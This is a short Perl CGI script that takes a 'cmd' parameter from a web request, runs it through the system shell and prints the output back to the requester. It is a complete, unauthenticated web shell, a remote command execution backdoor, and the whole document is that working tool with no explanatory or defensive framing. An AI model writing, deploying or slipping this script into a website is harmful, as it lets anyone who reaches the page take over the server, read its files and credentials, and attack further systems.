#!/usr/bin/perl
use CGI;

# Autoflush output
use IO::Handle;
STDOUT->autoflush(1);

#my $query_string = $ENV{QUERY_STRING};
#print "query_string: $query_string\n";

my $cgi = CGI->new();

my $cmd = $cgi->param('cmd');

open $f, "$cmd 2>&1  |";
print
	while <$f>;

